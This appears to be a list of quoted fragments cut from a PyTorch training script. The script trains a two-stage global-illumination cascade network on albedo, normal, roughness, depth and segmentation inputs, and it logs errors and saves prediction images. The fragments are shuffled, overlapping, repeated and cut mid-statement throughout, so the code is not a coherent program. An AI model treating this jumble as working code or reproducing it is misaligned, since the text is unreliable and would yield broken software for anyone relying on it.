"1+opt.cascadeLevel], dtype = np.float32) globalIllu3ErrsNpList= np.ones( [1, 1+opt.cascadeLevel], dtype = np.float32) renderedErrsNpList =",
") depth_cpu = dataBatch['depth'] depthBatch.data.resize_(depth_cpu.shape) depthBatch.data.copy_(depth_cpu ) imP1_cpu = dataBatch['imP1'] imP1Batch.data.resize_(imP1_cpu.shape) imP1Batch.data.copy_(imP1_cpu )",
"normalBatch, roughBatch, depthBatch, segBatch], dim=1) globalIllu2 = globIllu1to2(inputGlob2) globalIllu2s.append(globalIllu2 ) inputGlob3 = torch.cat([globalIllu2s[n],",
"height / width of the input image to network') parser.add_argument('--cuda', action='store_true', help='enables cuda')",
"2') parser.add_argument('--globalIllu3', type=float, default=1, help='the weight of global illumination prediction 3') # Fine",
"globalIllu3Errs.append(torch.sum( (globalIllu3s[m] - imP3Batch) * (globalIllu3s[m] - imP3Batch) * segBatch.expand_as(imP3Batch) ) / pixelNum",
").data , '{0}/{1}_imP3.png'.format(opt.experiment, j) ) # Save the predicted results for n in",
"error utils.writeErrToScreen('globalIllu2', globalIllu2Errs, epoch, j) utils.writeErrToScreen('globalIllu3', globalIllu3Errs, epoch, j) utils.writeErrToFile('globalIllu2', globalIllu2Errs, trainingLog, epoch,",
"opt.imageSize) ) normalBatch = Variable(torch.FloatTensor(opt.batchSize, 3, opt.imageSize, opt.imageSize) ) roughBatch = Variable(torch.FloatTensor(opt.batchSize, 1,",
"( 0.5*(globalIllu3s[n] + 1)*segBatch.expand_as(imP3Batch) )**(1.0/2.2) ).data, '{0}/{1}_imP3Pred_{2}.png'.format(opt.experiment, j, n) ) trainingLog.close() # Update",
"prediction 3') # Fine Tune the network parser.add_argument('--isFineTune', action = 'store_true', help='whether to",
"np.float32) globalIllu3ErrsNpList= np.ones( [1, 1+opt.cascadeLevel], dtype = np.float32) renderedErrsNpList = np.ones( [1, 1+opt.cascadeLevel],",
"0.999) ) ##################################### #################################### brdfDataset = dataLoader.BatchLoader(opt.dataRoot, imSize = opt.imageSize) brdfLoader = DataLoader(brdfDataset,",
"training network') # The training weight parser.add_argument('--globalIllu2', type=float, default=1, help='the weight of global",
"np.mean(globalIllu2ErrsNpList[j-999:j+1, :], axis=0), epoch, j) utils.writeNpErrToScreen('globalIllu3_Accu', np.mean(globalIllu3ErrsNpList[j-999:j+1, :], axis=0), epoch, j) utils.writeNpErrToFile('globalIllu2_Accu', np.mean(globalIllu2ErrsNpList[j-999:j+1,",
"opt.imageSize) ) depthBatch = Variable(torch.FloatTensor(opt.batchSize, 1, opt.imageSize, opt.imageSize) ) imP1Batch = Variable(torch.FloatTensor(opt.batchSize, 3,",
"(0.5*(roughBatch + 1)*segBatch.expand_as(roughBatch) ).data, '{0}/{1}_roughGt.png'.format(opt.experiment, j) ) depthOut = 1 / torch.clamp(depthBatch, 1e-6,",
"axis=0), epoch, j) utils.writeNpErrToScreen('globalIllu3_Accu', np.mean(globalIllu3ErrsNpList[j-999:j+1, :], axis=0), epoch, j) utils.writeNpErrToFile('globalIllu2_Accu', np.mean(globalIllu2ErrsNpList[j-999:j+1, :], axis=0),",
"num_workers = 8, shuffle = False) j = 0 globalIllu1ErrsNpList= np.ones( [1, 1+opt.cascadeLevel],",
"roughBatch, depthBatch, segBatch], dim=1) globalIllu3 = globIllu2to3(inputGlob3.detach() ) globalIllu3s.append(globalIllu3) ######################################################## globalIllu2Errs = []",
"1 / torch.clamp(depthBatch, 1e-6, 10) * segBatch.expand_as(depthBatch) depthOut = (depthOut - 0.25) /0.8",
"3') # Fine Tune the network parser.add_argument('--isFineTune', action = 'store_true', help='whether to fine-tune",
"if (epoch + 1) % 2 == 0: for param_group in opGlobalIllu1to2.param_groups: param_group['lr']",
"not') parser.add_argument('--epochId', type=int, default = -1, help='the training epoch of the network') #",
"( 0.5*(imP1Batch + 1)*segBatch.expand_as(imP1Batch))**(1.0/2.2) ).data , '{0}/{1}_imP1.png'.format(opt.experiment, j) ) vutils.save_image( ( ( 0.5*(imP2Batch",
"3, opt.imageSize, opt.imageSize) ) imP3Batch = Variable(torch.FloatTensor(opt.batchSize, 3, opt.imageSize, opt.imageSize) ) # Global",
"pixelNum = torch.sum(segBatch ).cpu().data.item() for m in range(0, n + 1): globalIllu2Errs.append( torch.sum(",
"( 0.5*(imP2Batch + 1)*segBatch.expand_as(imP2Batch))**(1.0/2.2) ).data , '{0}/{1}_imP2.png'.format(opt.experiment, j) ) vutils.save_image( ( ( 0.5*(imP3Batch",
"1)*segBatch.expand_as(roughBatch) ).data, '{0}/{1}_roughGt.png'.format(opt.experiment, j) ) depthOut = 1 / torch.clamp(depthBatch, 1e-6, 10) *",
"a CUDA device, so you should probably run with --cuda\") #################################### # initalize",
"inputGlob2 = torch.cat([imP1Batch, albedoBatch, normalBatch, roughBatch, depthBatch, segBatch], dim=1) globalIllu2 = globIllu1to2(inputGlob2) globalIllu2s.append(globalIllu2",
"1)*segBatch.expand_as(imP1Batch))**(1.0/2.2) ).data , '{0}/{1}_imP1.png'.format(opt.experiment, j) ) vutils.save_image( ( ( 0.5*(imP2Batch + 1)*segBatch.expand_as(imP2Batch))**(1.0/2.2) ).data",
"Optimier opGlobalIllu1to2 = optim.Adam(globIllu1to2.parameters(), lr=2e-4, betas=(0.5, 0.999) ) opGlobalIllu2to3 = optim.Adam(globIllu2to3.parameters(), lr=2e-4, betas=(0.5,",
"'store_true', help='whether to fine-tune the network or not') parser.add_argument('--epochId', type=int, default = -1,",
"opt.imageSize) ) imP2Batch = Variable(torch.FloatTensor(opt.batchSize, 3, opt.imageSize, opt.imageSize) ) imP3Batch = Variable(torch.FloatTensor(opt.batchSize, 3,",
"vutils.save_image( ( ( 0.5*(imP2Batch + 1)*segBatch.expand_as(imP2Batch))**(1.0/2.2) ).data , '{0}/{1}_imP2.png'.format(opt.experiment, j) ) vutils.save_image( (",
"import torch import numpy as np from torch.autograd import Variable import torch.optim as",
"models.globalIllumination() ######################################### if opt.isFineTune: globIllu1to2.load_state_dict(torch.load('{0}/globIllu1to2_{1}.pth'.format(opt.experiment, opt.epochId) ) ) globIllu2to3.load_state_dict(torch.load('{0}/globIllu2to3_{1}.pth'.format(opt.experiment, opt.epochId) ) ) ##############",
"renderedErrsNpList = np.ones( [1, 1+opt.cascadeLevel], dtype = np.float32) for epoch in list(range(opt.epochId+1, opt.nepoch)",
"epoch, j) utils.writeNpErrToScreen('globalIllu3_Accu', np.mean(globalIllu3ErrsNpList[1:j+1, :], axis=0), epoch, j) utils.writeNpErrToFile('globalIllu2_Accu', np.mean(globalIllu2ErrsNpList[1:j+1, :], axis=0), trainingLog,",
"/ torch.clamp(depthBatch, 1e-6, 10) * segBatch.expand_as(depthBatch) depthOut = (depthOut - 0.25) /0.8 vutils.save_image(",
"( 0.5*(imP3Batch + 1)*segBatch.expand_as(imP3Batch))**(1.0/2.2) ).data , '{0}/{1}_imP3.png'.format(opt.experiment, j) ) # Save the predicted",
"argparse import random import os import models import torchvision.utils as vutils import utils",
"# Update the training rate if (epoch + 1) % 2 == 0:",
"(0.5*(normalBatch + 1)*segBatch.expand_as(normalBatch) ).data, '{0}/{1}_normalGt.png'.format(opt.experiment, j) ) vutils.save_image( (0.5*(roughBatch + 1)*segBatch.expand_as(roughBatch) ).data, '{0}/{1}_roughGt.png'.format(opt.experiment,",
"1+opt.cascadeLevel], dtype = np.float32) for epoch in list(range(opt.epochId+1, opt.nepoch) ): trainingLog = open('{0}/trainingLog_{1}.txt'.format(opt.experiment,",
"network parser.add_argument('--isFineTune', action = 'store_true', help='whether to fine-tune the network or not') parser.add_argument('--epochId',",
"globIllu1to2(inputGlob2) globalIllu2s.append(globalIllu2 ) inputGlob3 = torch.cat([globalIllu2s[n], albedoBatch, normalBatch, roughBatch, depthBatch, segBatch], dim=1) globalIllu3",
"for n in range(0, opt.cascadeLevel + 1): vutils.save_image( ( ( 0.5*(globalIllu2s[n] + 1)*segBatch.expand_as(imP2Batch)",
"- imP2Batch) * segBatch.expand_as(imP2Batch) ) / pixelNum / 3.0 ) globalIllu3Errs.append(torch.sum( (globalIllu3s[m] -",
") imP2Batch = Variable(torch.FloatTensor(opt.batchSize, 3, opt.imageSize, opt.imageSize) ) imP3Batch = Variable(torch.FloatTensor(opt.batchSize, 3, opt.imageSize,",
"[globalIllu3ErrsNpList, utils.turnErrorIntoNumpy(globalIllu3Errs)], axis=0) if j < 1000: utils.writeNpErrToScreen('globalIllu2_Accu:', np.mean(globalIllu2ErrsNpList[1:j+1, :], axis=0), epoch, j)",
"data from cpu to gpu albedo_cpu = dataBatch['albedo'] albedoBatch.data.resize_(albedo_cpu.shape) albedoBatch.data.copy_(albedo_cpu ) normal_cpu =",
"= [] globalIllu3Errs = [] pixelNum = torch.sum(segBatch ).cpu().data.item() for m in range(0,",
"== 0: # Save the ground truth and the input vutils.save_image( (0.5*(albedoBatch +",
"imP1Batch.cuda(opt.gpuId) imP2Batch = imP2Batch.cuda(opt.gpuId) imP3Batch = imP3Batch.cuda(opt.gpuId) globIllu1to2 = globIllu1to2.cuda(opt.gpuId) globIllu2to3 = globIllu2to3.cuda(opt.gpuId)",
"imP2Batch) * (globalIllu2s[m] - imP2Batch) * segBatch.expand_as(imP2Batch) ) / pixelNum / 3.0 )",
"default=1, help='the weight of global illumination prediction 2') parser.add_argument('--globalIllu3', type=float, default=1, help='the weight",
"1)*segBatch.expand_as(normalBatch) ).data, '{0}/{1}_normalGt.png'.format(opt.experiment, j) ) vutils.save_image( (0.5*(roughBatch + 1)*segBatch.expand_as(roughBatch) ).data, '{0}/{1}_roughGt.png'.format(opt.experiment, j) )",
"or not') parser.add_argument('--epochId', type=int, default = -1, help='the training epoch of the network')",
"as optim import argparse import random import os import models import torchvision.utils as",
"= Variable(torch.FloatTensor(opt.batchSize, 3, opt.imageSize, opt.imageSize) ) roughBatch = Variable(torch.FloatTensor(opt.batchSize, 1, opt.imageSize, opt.imageSize) )",
"[1, 1+opt.cascadeLevel], dtype = np.float32) globalIllu3ErrsNpList= np.ones( [1, 1+opt.cascadeLevel], dtype = np.float32) renderedErrsNpList",
"opt.cuda: albedoBatch = albedoBatch.cuda(opt.gpuId) normalBatch = normalBatch.cuda(opt.gpuId) roughBatch = roughBatch.cuda(opt.gpuId) depthBatch = depthBatch.cuda(opt.gpuId)",
"ground truth and the input vutils.save_image( (0.5*(albedoBatch + 1)*segBatch.expand_as(albedoBatch) ).data, '{0}/{1}_albedoGt.png'.format(opt.experiment, j) )",
"and models') # The basic training setting parser.add_argument('--nepoch', type=int, default=18, help='the number of",
"from torch.utils.data import DataLoader parser = argparse.ArgumentParser() # The locationi of training set",
"imP3Batch.data.resize_(imP3_cpu.shape) imP3Batch.data.copy_(imP3_cpu ) opGlobalIllu1to2.zero_grad() opGlobalIllu2to3.zero_grad() ######################################################## # Build the cascade network architecture #",
"albedoBatch, normalBatch, roughBatch, depthBatch, segBatch], dim=1) globalIllu2 = globIllu1to2(inputGlob2) globalIllu2s.append(globalIllu2 ) inputGlob3 =",
"[] n = 0 inputGlob2 = torch.cat([imP1Batch, albedoBatch, normalBatch, roughBatch, depthBatch, segBatch], dim=1)",
"lr=2e-4, betas=(0.5, 0.999) ) opGlobalIllu2to3 = optim.Adam(globIllu2to3.parameters(), lr=2e-4, betas=(0.5, 0.999) ) ##################################### ####################################",
"brdfDataset = dataLoader.BatchLoader(opt.dataRoot, imSize = opt.imageSize) brdfLoader = DataLoader(brdfDataset, batch_size = opt.batchSize, num_workers",
"/ pixelNum / 3.0 ) globalIllu3Errs.append(torch.sum( (globalIllu3s[m] - imP3Batch) * (globalIllu3s[m] - imP3Batch)",
"globalIllu2ErrsNpList = np.concatenate( [globalIllu2ErrsNpList, utils.turnErrorIntoNumpy(globalIllu2Errs)], axis=0) globalIllu3ErrsNpList = np.concatenate( [globalIllu3ErrsNpList, utils.turnErrorIntoNumpy(globalIllu3Errs)], axis=0) if",
"# Save the ground truth and the input vutils.save_image( (0.5*(albedoBatch + 1)*segBatch.expand_as(albedoBatch) ).data,",
"'{0}/{1}_albedoGt.png'.format(opt.experiment, j) ) vutils.save_image( (0.5*(normalBatch + 1)*segBatch.expand_as(normalBatch) ).data, '{0}/{1}_normalGt.png'.format(opt.experiment, j) ) vutils.save_image( (0.5*(roughBatch",
"= albedoBatch.cuda(opt.gpuId) normalBatch = normalBatch.cuda(opt.gpuId) roughBatch = roughBatch.cuda(opt.gpuId) depthBatch = depthBatch.cuda(opt.gpuId) segBatch =",
"vutils.save_image( ( ( 0.5*(imP3Batch + 1)*segBatch.expand_as(imP3Batch))**(1.0/2.2) ).data , '{0}/{1}_imP3.png'.format(opt.experiment, j) ) # Save",
"= 8, shuffle = False) j = 0 globalIllu1ErrsNpList= np.ones( [1, 1+opt.cascadeLevel], dtype",
") opGlobalIllu2to3 = optim.Adam(globIllu2to3.parameters(), lr=2e-4, betas=(0.5, 0.999) ) ##################################### #################################### brdfDataset = dataLoader.BatchLoader(opt.dataRoot,",
"initalize tensors albedoBatch = Variable(torch.FloatTensor(opt.batchSize, 3, opt.imageSize, opt.imageSize) ) normalBatch = Variable(torch.FloatTensor(opt.batchSize, 3,",
"'{0}/{1}_imP2.png'.format(opt.experiment, j) ) vutils.save_image( ( ( 0.5*(imP3Batch + 1)*segBatch.expand_as(imP3Batch))**(1.0/2.2) ).data , '{0}/{1}_imP3.png'.format(opt.experiment, j)",
"8, shuffle = False) j = 0 globalIllu1ErrsNpList= np.ones( [1, 1+opt.cascadeLevel], dtype =",
"'{0}/{1}_imP1.png'.format(opt.experiment, j) ) vutils.save_image( ( ( 0.5*(imP2Batch + 1)*segBatch.expand_as(imP2Batch))**(1.0/2.2) ).data , '{0}/{1}_imP2.png'.format(opt.experiment, j)",
"- imP3Batch) * (globalIllu3s[m] - imP3Batch) * segBatch.expand_as(imP3Batch) ) / pixelNum / 3.0",
"== 0 ) if opt.experiment is None: opt.experiment = 'check_globalillumination' os.system('mkdir {0}'.format(opt.experiment) )",
"######################################### if opt.isFineTune: globIllu1to2.load_state_dict(torch.load('{0}/globIllu1to2_{1}.pth'.format(opt.experiment, opt.epochId) ) ) globIllu2to3.load_state_dict(torch.load('{0}/globIllu2to3_{1}.pth'.format(opt.experiment, opt.epochId) ) ) ############## ######################",
"% opt.experiment ) g2W, g3W = opt.globalIllu2, opt.globalIllu3 opt.gpuId = opt.deviceIds[0] opt.seed =",
"np.ones( [1, 1+opt.cascadeLevel], dtype = np.float32) globalIllu2ErrsNpList = np.ones( [1, 1+opt.cascadeLevel], dtype =",
") vutils.save_image( ( ( 0.5*(imP3Batch + 1)*segBatch.expand_as(imP3Batch))**(1.0/2.2) ).data , '{0}/{1}_imP3.png'.format(opt.experiment, j) ) #",
").data, '{0}/{1}_imP2Pred_{2}.png'.format(opt.experiment, j, n) ) vutils.save_image( ( ( 0.5*(globalIllu3s[n] + 1)*segBatch.expand_as(imP3Batch) )**(1.0/2.2) ).data,",
"action = 'store_true', help='whether to fine-tune the network or not') parser.add_argument('--epochId', type=int, default",
"global illumination prediction 2') parser.add_argument('--globalIllu3', type=float, default=1, help='the weight of global illumination prediction",
"imP3Batch.cuda(opt.gpuId) globIllu1to2 = globIllu1to2.cuda(opt.gpuId) globIllu2to3 = globIllu2to3.cuda(opt.gpuId) #################################### #################################### # Global Optimier opGlobalIllu1to2",
"help='the number of epochs for training') parser.add_argument('--batchSize', type=int, default=16, help='input batch size') parser.add_argument('--imageSize',",
"epoch in list(range(opt.epochId+1, opt.nepoch) ): trainingLog = open('{0}/trainingLog_{1}.txt'.format(opt.experiment, epoch), 'w') for i, dataBatch",
"= torch.cat([imP1Batch, albedoBatch, normalBatch, roughBatch, depthBatch, segBatch], dim=1) globalIllu2 = globIllu1to2(inputGlob2) globalIllu2s.append(globalIllu2 )",
"= models.globalIllumination() globIllu2to3 = models.globalIllumination() ######################################### if opt.isFineTune: globIllu1to2.load_state_dict(torch.load('{0}/globIllu1to2_{1}.pth'.format(opt.experiment, opt.epochId) ) ) globIllu2to3.load_state_dict(torch.load('{0}/globIllu2to3_{1}.pth'.format(opt.experiment,",
"albedoBatch.cuda(opt.gpuId) normalBatch = normalBatch.cuda(opt.gpuId) roughBatch = roughBatch.cuda(opt.gpuId) depthBatch = depthBatch.cuda(opt.gpuId) segBatch = segBatch.cuda(opt.gpuId)",
"parser.parse_args() print(opt) assert(opt.cascadeLevel == 0 ) if opt.experiment is None: opt.experiment = 'check_globalillumination'",
"epoch, j) utils.writeNpErrToFile('globalIllu3_Accu', np.mean(globalIllu3ErrsNpList[1:j+1, :], axis=0), trainingLog, epoch, j) else: utils.writeNpErrToScreen('globalIllu2_Accu', np.mean(globalIllu2ErrsNpList[j-999:j+1, :],",
"j) utils.writeNpErrToFile('globalIllu2_Accu', np.mean(globalIllu2ErrsNpList[j-999:j+1, :], axis=0), trainingLog, epoch, j) utils.writeNpErrToFile('globalIllu3_Accu', np.mean(globalIllu3ErrsNpList[j-999:j+1, :], axis=0), trainingLog,",
"samples and models') # The basic training setting parser.add_argument('--nepoch', type=int, default=18, help='the number",
"n + 1): globalIllu2Errs.append( torch.sum( (globalIllu2s[m] - imP2Batch) * (globalIllu2s[m] - imP2Batch) *",
"of the network') # The detail network setting parser.add_argument('--cascadeLevel', type=int, default=0, help='how much",
"random import os import models import torchvision.utils as vutils import utils import dataLoader",
"= Variable(torch.FloatTensor(opt.batchSize, 3, opt.imageSize, opt.imageSize) ) depthBatch = Variable(torch.FloatTensor(opt.batchSize, 1, opt.imageSize, opt.imageSize) )",
"axis=0) if j < 1000: utils.writeNpErrToScreen('globalIllu2_Accu:', np.mean(globalIllu2ErrsNpList[1:j+1, :], axis=0), epoch, j) utils.writeNpErrToScreen('globalIllu3_Accu', np.mean(globalIllu3ErrsNpList[1:j+1,",
"with --cuda\") #################################### # initalize tensors albedoBatch = Variable(torch.FloatTensor(opt.batchSize, 3, opt.imageSize, opt.imageSize) )",
"basic training setting parser.add_argument('--nepoch', type=int, default=18, help='the number of epochs for training') parser.add_argument('--batchSize',",
"= g2W * globalIllu2ErrSum + g3W * globalIllu3ErrSum totalErr.backward() opGlobalIllu1to2.step() opGlobalIllu2to3.step() # Output",
"globalIllu3s.append(globalIllu3) ######################################################## globalIllu2Errs = [] globalIllu3Errs = [] pixelNum = torch.sum(segBatch ).cpu().data.item() for",
"utils.writeNpErrToScreen('globalIllu3_Accu', np.mean(globalIllu3ErrsNpList[j-999:j+1, :], axis=0), epoch, j) utils.writeNpErrToFile('globalIllu2_Accu', np.mean(globalIllu2ErrsNpList[j-999:j+1, :], axis=0), trainingLog, epoch, j)",
"np.concatenate( [globalIllu3ErrsNpList, utils.turnErrorIntoNumpy(globalIllu3Errs)], axis=0) if j < 1000: utils.writeNpErrToScreen('globalIllu2_Accu:', np.mean(globalIllu2ErrsNpList[1:j+1, :], axis=0), epoch,",
"depthOut*segBatch.expand_as(depthBatch) ).data, '{0}/{1}_depthGt.png'.format(opt.experiment, j) ) vutils.save_image( ( ( 0.5*(imP1Batch + 1)*segBatch.expand_as(imP1Batch))**(1.0/2.2) ).data ,",
"for epoch in list(range(opt.epochId+1, opt.nepoch) ): trainingLog = open('{0}/trainingLog_{1}.txt'.format(opt.experiment, epoch), 'w') for i,",
") / pixelNum / 3.0 ) globalIllu3Errs.append(torch.sum( (globalIllu3s[m] - imP3Batch) * (globalIllu3s[m] -",
"dtype = np.float32) globalIllu2ErrsNpList = np.ones( [1, 1+opt.cascadeLevel], dtype = np.float32) globalIllu3ErrsNpList= np.ones(",
"input vutils.save_image( (0.5*(albedoBatch + 1)*segBatch.expand_as(albedoBatch) ).data, '{0}/{1}_albedoGt.png'.format(opt.experiment, j) ) vutils.save_image( (0.5*(normalBatch + 1)*segBatch.expand_as(normalBatch)",
"= open('{0}/trainingLog_{1}.txt'.format(opt.experiment, epoch), 'w') for i, dataBatch in enumerate(brdfLoader): j += 1 #",
"epoch, j) utils.writeErrToScreen('globalIllu3', globalIllu3Errs, epoch, j) utils.writeErrToFile('globalIllu2', globalIllu2Errs, trainingLog, epoch, j) utils.writeErrToFile('globalIllu3', globalIllu3Errs,",
"1e-6, 10) * segBatch.expand_as(depthBatch) depthOut = (depthOut - 0.25) /0.8 vutils.save_image( ( depthOut*segBatch.expand_as(depthBatch)",
"param_group['lr'] /= 2 for param_group in opGlobalIllu2to3.param_groups: param_group['lr'] /= 2 np.save('{0}/globalIllu2_{1}.npy'.format(opt.experiment, epoch), globalIllu2ErrsNpList",
"segBatch], dim=1) globalIllu2 = globIllu1to2(inputGlob2) globalIllu2s.append(globalIllu2 ) inputGlob3 = torch.cat([globalIllu2s[n], albedoBatch, normalBatch, roughBatch,",
"globalIllu2ErrsNpList = np.ones( [1, 1+opt.cascadeLevel], dtype = np.float32) globalIllu3ErrsNpList= np.ones( [1, 1+opt.cascadeLevel], dtype",
"epoch, j) utils.writeNpErrToFile('globalIllu2_Accu', np.mean(globalIllu2ErrsNpList[j-999:j+1, :], axis=0), trainingLog, epoch, j) utils.writeNpErrToFile('globalIllu3_Accu', np.mean(globalIllu3ErrsNpList[j-999:j+1, :], axis=0),",
"albedoBatch = albedoBatch.cuda(opt.gpuId) normalBatch = normalBatch.cuda(opt.gpuId) roughBatch = roughBatch.cuda(opt.gpuId) depthBatch = depthBatch.cuda(opt.gpuId) segBatch",
"#################################### # Global Optimier opGlobalIllu1to2 = optim.Adam(globIllu1to2.parameters(), lr=2e-4, betas=(0.5, 0.999) ) opGlobalIllu2to3 =",
"= dataBatch['seg'] segBatch.data.resize_(seg_cpu.shape) segBatch.data.copy_(seg_cpu ) depth_cpu = dataBatch['depth'] depthBatch.data.resize_(depth_cpu.shape) depthBatch.data.copy_(depth_cpu ) imP1_cpu =",
"roughBatch.cuda(opt.gpuId) depthBatch = depthBatch.cuda(opt.gpuId) segBatch = segBatch.cuda(opt.gpuId) imP1Batch = imP1Batch.cuda(opt.gpuId) imP2Batch = imP2Batch.cuda(opt.gpuId)",
"3, opt.imageSize, opt.imageSize) ) roughBatch = Variable(torch.FloatTensor(opt.batchSize, 1, opt.imageSize, opt.imageSize) ) segBatch =",
"= np.float32) globalIllu3ErrsNpList= np.ones( [1, 1+opt.cascadeLevel], dtype = np.float32) renderedErrsNpList = np.ones( [1,",
"j < 1000: utils.writeNpErrToScreen('globalIllu2_Accu:', np.mean(globalIllu2ErrsNpList[1:j+1, :], axis=0), epoch, j) utils.writeNpErrToScreen('globalIllu3_Accu', np.mean(globalIllu3ErrsNpList[1:j+1, :], axis=0),",
"+ 1)*segBatch.expand_as(albedoBatch) ).data, '{0}/{1}_albedoGt.png'.format(opt.experiment, j) ) vutils.save_image( (0.5*(normalBatch + 1)*segBatch.expand_as(normalBatch) ).data, '{0}/{1}_normalGt.png'.format(opt.experiment, j)",
"/= 2 np.save('{0}/globalIllu2_{1}.npy'.format(opt.experiment, epoch), globalIllu2ErrsNpList ) np.save('{0}/globalIllu3_{1}.npy'.format(opt.experiment, epoch), globalIllu3ErrsNpList ) torch.save(globIllu1to2.state_dict(), '{0}/globIllu1to2_{1}.pth'.format(opt.experiment, epoch)",
"normalBatch, roughBatch, depthBatch, segBatch], dim=1) globalIllu3 = globIllu2to3(inputGlob3.detach() ) globalIllu3s.append(globalIllu3) ######################################################## globalIllu2Errs =",
") os.system('cp *.py %s' % opt.experiment ) g2W, g3W = opt.globalIllu2, opt.globalIllu3 opt.gpuId",
"(0.5*(albedoBatch + 1)*segBatch.expand_as(albedoBatch) ).data, '{0}/{1}_albedoGt.png'.format(opt.experiment, j) ) vutils.save_image( (0.5*(normalBatch + 1)*segBatch.expand_as(normalBatch) ).data, '{0}/{1}_normalGt.png'.format(opt.experiment,",
"import torch.optim as optim import argparse import random import os import models import",
"import Variable import torch.optim as optim import argparse import random import os import",
"-1, help='the training epoch of the network') # The detail network setting parser.add_argument('--cascadeLevel',",
"you should probably run with --cuda\") #################################### # initalize tensors albedoBatch = Variable(torch.FloatTensor(opt.batchSize,",
"normalBatch = Variable(torch.FloatTensor(opt.batchSize, 3, opt.imageSize, opt.imageSize) ) roughBatch = Variable(torch.FloatTensor(opt.batchSize, 1, opt.imageSize, opt.imageSize)",
"globalIllu3 = globIllu2to3(inputGlob3.detach() ) globalIllu3s.append(globalIllu3) ######################################################## globalIllu2Errs = [] globalIllu3Errs = [] pixelNum",
"( ( 0.5*(imP2Batch + 1)*segBatch.expand_as(imP2Batch))**(1.0/2.2) ).data , '{0}/{1}_imP2.png'.format(opt.experiment, j) ) vutils.save_image( ( (",
"the input vutils.save_image( (0.5*(albedoBatch + 1)*segBatch.expand_as(albedoBatch) ).data, '{0}/{1}_albedoGt.png'.format(opt.experiment, j) ) vutils.save_image( (0.5*(normalBatch +",
") if opt.experiment is None: opt.experiment = 'check_globalillumination' os.system('mkdir {0}'.format(opt.experiment) ) os.system('cp *.py",
"0.5*(globalIllu3s[n] + 1)*segBatch.expand_as(imP3Batch) )**(1.0/2.2) ).data, '{0}/{1}_imP3Pred_{2}.png'.format(opt.experiment, j, n) ) trainingLog.close() # Update the",
"opt.epochId) ) ) globIllu2to3.load_state_dict(torch.load('{0}/globIllu2to3_{1}.pth'.format(opt.experiment, opt.epochId) ) ) ############## ###################### # Send things into",
"into GPU if opt.cuda: albedoBatch = albedoBatch.cuda(opt.gpuId) normalBatch = normalBatch.cuda(opt.gpuId) roughBatch = roughBatch.cuda(opt.gpuId)",
"pixelNum / 3.0 ) globalIllu2ErrSum = sum(globalIllu2Errs) globalIllu3ErrSum = sum(globalIllu3Errs) totalErr = g2W",
"[1, 1+opt.cascadeLevel], dtype = np.float32) renderedErrsNpList = np.ones( [1, 1+opt.cascadeLevel], dtype = np.float32)",
") # Save the predicted results for n in range(0, opt.cascadeLevel + 1):",
") vutils.save_image( ( ( 0.5*(globalIllu3s[n] + 1)*segBatch.expand_as(imP3Batch) )**(1.0/2.2) ).data, '{0}/{1}_imP3Pred_{2}.png'.format(opt.experiment, j, n) )",
"j) utils.writeNpErrToScreen('globalIllu3_Accu', np.mean(globalIllu3ErrsNpList[j-999:j+1, :], axis=0), epoch, j) utils.writeNpErrToFile('globalIllu2_Accu', np.mean(globalIllu2ErrsNpList[j-999:j+1, :], axis=0), trainingLog, epoch,",
"j% 2000 == 0: # Save the ground truth and the input vutils.save_image(",
"( ( 0.5*(globalIllu2s[n] + 1)*segBatch.expand_as(imP2Batch) )**(1.0/2.2) ).data, '{0}/{1}_imP2Pred_{2}.png'.format(opt.experiment, j, n) ) vutils.save_image( (",
"= Variable(torch.FloatTensor(opt.batchSize, 3, opt.imageSize, opt.imageSize) ) # Global illumination globIllu1to2 = models.globalIllumination() globIllu2to3",
"epoch of the network') # The detail network setting parser.add_argument('--cascadeLevel', type=int, default=0, help='how",
"= parser.parse_args() print(opt) assert(opt.cascadeLevel == 0 ) if opt.experiment is None: opt.experiment =",
"trainingLog = open('{0}/trainingLog_{1}.txt'.format(opt.experiment, epoch), 'w') for i, dataBatch in enumerate(brdfLoader): j += 1",
"from torch.autograd import Variable import torch.optim as optim import argparse import random import",
"= [] globalIllu3s = [] n = 0 inputGlob2 = torch.cat([imP1Batch, albedoBatch, normalBatch,",
"the cascade network architecture # globalIllu2s = [] globalIllu3s = [] n =",
"= depthBatch.cuda(opt.gpuId) segBatch = segBatch.cuda(opt.gpuId) imP1Batch = imP1Batch.cuda(opt.gpuId) imP2Batch = imP2Batch.cuda(opt.gpuId) imP3Batch =",
"= torch.sum(segBatch ).cpu().data.item() for m in range(0, n + 1): globalIllu2Errs.append( torch.sum( (globalIllu2s[m]",
"j) utils.writeErrToScreen('globalIllu3', globalIllu3Errs, epoch, j) utils.writeErrToFile('globalIllu2', globalIllu2Errs, trainingLog, epoch, j) utils.writeErrToFile('globalIllu3', globalIllu3Errs, trainingLog,",
"network') parser.add_argument('--cuda', action='store_true', help='enables cuda') parser.add_argument('--deviceIds', type=int, nargs='+', default=[0], help='the gpus used for",
"( 0.5*(globalIllu2s[n] + 1)*segBatch.expand_as(imP2Batch) )**(1.0/2.2) ).data, '{0}/{1}_imP2Pred_{2}.png'.format(opt.experiment, j, n) ) vutils.save_image( ( (",
"action='store_true', help='enables cuda') parser.add_argument('--deviceIds', type=int, nargs='+', default=[0], help='the gpus used for training network')",
"globalIllu2Errs, trainingLog, epoch, j) utils.writeErrToFile('globalIllu3', globalIllu3Errs, trainingLog, epoch, j) globalIllu2ErrsNpList = np.concatenate( [globalIllu2ErrsNpList,",
"segBatch = Variable(torch.FloatTensor(opt.batchSize, 3, opt.imageSize, opt.imageSize) ) depthBatch = Variable(torch.FloatTensor(opt.batchSize, 1, opt.imageSize, opt.imageSize)",
"2 == 0: for param_group in opGlobalIllu1to2.param_groups: param_group['lr'] /= 2 for param_group in",
"Variable(torch.FloatTensor(opt.batchSize, 3, opt.imageSize, opt.imageSize) ) # Global illumination globIllu1to2 = models.globalIllumination() globIllu2to3 =",
"i, dataBatch in enumerate(brdfLoader): j += 1 # Load data from cpu to",
"'{0}/{1}_normalGt.png'.format(opt.experiment, j) ) vutils.save_image( (0.5*(roughBatch + 1)*segBatch.expand_as(roughBatch) ).data, '{0}/{1}_roughGt.png'.format(opt.experiment, j) ) depthOut =",
"* segBatch.expand_as(imP2Batch) ) / pixelNum / 3.0 ) globalIllu3Errs.append(torch.sum( (globalIllu3s[m] - imP3Batch) *",
"locationi of training set parser.add_argument('--dataRoot', default='/home/zhl/SiggraphAsia18/Data/train/', help='path to images') parser.add_argument('--experiment', default=None, help='the path",
